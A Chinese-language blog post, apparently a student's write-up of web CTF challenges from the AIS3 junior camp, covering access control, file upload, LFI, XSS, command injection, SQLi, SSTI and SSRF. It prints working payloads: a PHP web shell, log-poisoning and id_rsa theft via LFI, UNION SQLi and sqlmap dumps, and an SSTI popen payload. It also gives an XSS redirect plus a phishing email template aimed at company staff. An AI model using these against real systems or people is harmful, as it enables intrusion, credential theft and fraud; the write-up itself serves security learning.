HackMD
這次是第二次參加AIS3系列活動,第一次是大約2周前的AIS3。很幸運的在這次的junior拿到個人優秀獎,有點可惜的是因為最近真的超忙(社團、靶機、其他有的沒的東西要處理,沒有時間把全部的題目都寫上來,另外附上專題連結,這算是我自己第一次設計的題目,比較可惜的是我沒有在上台前重新完整的審核過,還有沒有找相關類似CVE或real word案例,不然我覺得整體主題、流程不算差,當然助教真的幫忙很多、給很多建議,像是簡報不應該放太多字、要放分工表、重點說明透過本次專題過程學習到的內容等等。沒拿到最佳專題真的覺得蠻可惜的因為這個專題我硬幹了幾乎快24小時才完成。但也有了這次經驗讓我知道日後有哪些點是可以加強的。
01 - Broken Access Control
Broken Access Control的形式通常以網址uri /1 /2 /3 ,或用burpsuite 攔截觀察GET 參數,如果後端沒有控制好存取權限有機會fuzzing 出可以水平提權,或者垂直提權。
BAC01
URL http://ctfd-ais3.crazyfirelee.tw:9001/
點進去後一個,隨便輸入一個user 之後觀察uri /user,嘗試/admin拿到FLAG
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
BAC02
在http://ctfd-ais3.crazyfirelee.tw:9002/list
觀察該網頁下的商品,最後在/product/4找到FLAG
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
02 - File Upload
File Upload如果沒有做好檔案內容管理,非常有機會可以RCE,在大多靶機中常常以上傳php-reverse-shell來利用此漏洞,在嘗試這個漏洞中,網站可能會有一些filter像是
- 查看
content-type
bypass 方法可以透過burpsuite 修改
content-type格式
- 檔案名稱
可以修改為
.jpg.php、.pHp、php3、php5等
- 檢查image magic number
在檔案前增加
.jpg, .jpeg:FF D8 FF、.png:89 50 4E 47 0D 0A 1A 0A、.gif:47 49 46 38 39 61(GIF89a)等等手法
FIL01
因為沒有任何限制直接上傳一個web shell <?php echo system($_GET['cmd']); ?>,上傳後有好心的給web shell 放置處,點過去後操作後面參數?cmd=即可
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
FIL02
已知會檢查content-type,檔名,直接用burpsuite,修改content-type,檔名即可上傳成功
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
03 - Local File Inclusion
如果福報夠好也能透過LFI 2 RCE,LFI通常是沒有做到良好的讀取權限控管,簡單的測試方式通常為讀取/etc/passwd,讀取後也能知道該主機的user, 如果有id_rsa可以透過LFI得到/home/USER_NAME/.ssh/id_rsa,又或者利用讀取log 來RCE,例如ssh 的/var/log/auth.log、還有web log /var/log/a pache2/access.log 用類似的套路去跟server 互動時塞入<?php echo system($_GET['cmd']); ?>
LFI01
打開網頁後看到有圖片先檢查圖片來源http://ctfd-ais3.crazyfirelee.tw:9021/include.php?GetType=file_get_contents&file=static/bitcoinCat.jpg在file=一看就知道是透過路徑存取,因此存在很大可能可以LFI,透過PHP偽協議拿到index.php的base64,拿去decode後發現username(admin) password(CATLOVEBITCOINMEOWMEOW) 放在裡面的code,登入後拿到flag
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$username = $_POST["username"];
$password = $_POST["password"];
if ($username === "admin" && $password === "CATLOVEBITCOINMEOWMEOW") {
echo "<div class='alert alert-success mt-3'>" . getenv('FLAG') . "</div>";
} else {
echo "<div class='alert alert-danger mt-3'>Username or Password ERROR</div>";
}
}
?>
LFI02
繞過限制上傳一個web shell,查看URLhttp://ctfd-ais3.crazyfirelee.tw:9022/post.php?form=form.html在form=參數改成已上傳的web shell 路徑加上&cmd=就成功RCE拿到FLAG,這裡要使用的是&cmd原因是因為前面已經有GET參數,要在串接請求會使用&
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
04 - Cross-Site Scripting
XSS漏洞最簡單的測試方法,在輸入框處塞入簡單的js alert 去做測試,如果公司有XSS漏洞,加上員工資安意識不足,可能有機會對員工發動社交工程,例如透過存在漏洞的網址塞入以下payload,再發釣魚信給相關想釣出帳號密碼的公司部門,把YOUR_URL換成釣魚連結
<script>
location.href = "YOUR_URL"
</script>
主旨: [公司名稱] - 系統維護通知
內容:
尊敬的用戶,
我們的系統正在進行例行維護。為了確保您的帳戶安全,請點擊以下連結並重新登錄您的帳戶以確認您的信息無誤:
[點擊這裡重新登錄](http://company-site.com/page?payload=<XSS_PAYLOAD>)
我們感謝您的理解和支持。如有任何疑問,請隨時聯繫我們的技術支持團隊。
此致,
[公司名稱] 技術支持團隊
XSS01
透過看source code 可以看到FLAG 變數,再輸入框輸入payload
</script>alert(FLAG)</script>即可彈出FLAG
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
05 - Command Injection
有這個漏洞幾乎等於RCE,一樣的手法各種shell 都可以塞,在挖掘這個洞我覺得,需要搭配burpsuite 看比較容易發現,比較明顯得洞像是有些測試連線是否正常的網站可能有輸入框讓user輸入待測IP,其背後程式可能會是ping -c
CMD01
使用; ls 之後就看到FLAG,直接;cat F*,即可
之所以要用;是因為;在linux 中是命令分隔符號
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
CMD02
使用;l''s之後就看到FLAG,直接c''at F*即可
在linux 中'是用來將字串包裹起來這裡用兩個'把字串閉合掉。
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
06 - SQL Injection
SQLI非常經典,其危害程度也不低,可以刪除、修改、新增資料庫內容,福報好也有機會拿到sql shell(我是沒拿過,除此之外有不少網站都用同樣模板,可以透過一樣的sqli 手法拿到許多後台帳密。(通報了也不修
SQL01
使用最經典的' or 1=1 -- ;#,就拿到FLAG(因為不確定是否一定存在admin這個user,又因通常管理員會是資料庫第一位,所以直接執行payload不加username)
在測試是否有無sqli常用的是'因為如果網站沒有做好處理再錯誤的sql 語句極有可能噴錯,我初學sql i的時候也覺得很酷變自己用phpmyadmin實作
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
SQL02
一開始用' ODER BY -- ;測試有4個column,如使用' ODER BY 5 -- ;則會顯示1054 (42S22): Unknown column '5' in 'order clause'
之後使用
' UNION SELECT 1,schema_name,3,4 FROM information_schema.schemata-- ;
挖下去其他的DB感覺不像是可以挖到該網站帳密的username/password,之後再挖ApexPredators剛好簡潔明瞭裡面一個users table
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
' union select 1,1,1,table_name from information_schema.tables where table_schema='ApexPredators' -- ;
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
找到 table users
' union select 1,1,1,column_name from information_schema.columns where table_schema="ApexPredators" and table_name="users" -- ;
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
找到id isAdmin password username
' UNION SELECT 1, username, password, 4 FROM ApexPredators.users WHERE isAdmin=1-- ;
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
找到username KubenBlisk & password BliskLeader#2024
登入後即可拿到FLAG
另解:
用sqlmap dump出users table
sqlmap --url http://ctfd-ais3.crazyfirelee.tw:9052/ --batch --forms -D ApexPredators -T users --dump - The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
07 - Server-Side Template Injection
SSTI在real word中我沒遇過,在CTF中常常會有的題目,這個洞也是一樣幾乎等於RCE ,其危害程度不容小覷
STI01
使用payload{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat F*').read() }}可以拿到FLAG
STI02
使用payload{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat F*').read() }}我覺得這裡可以用同上payload是運氣夠好,在打CTF的時候通常會去查看github 上 web ctf cheat sheet
08 - Server-Side Request Forgery
SSRF一樣如果能讀取本地端檔案就有機會RCE,例如說因為權限控管問題可以讀取到id_rsa,利用讀取到/etc/passwd得知username之後去讀取/home/USERNAME/.ssh/id_rsa
SRF01
透過burpsuite修改url=參數讀取本地端檔案
SRF02
透過burpsuite修改url=參數偽造localhost請求
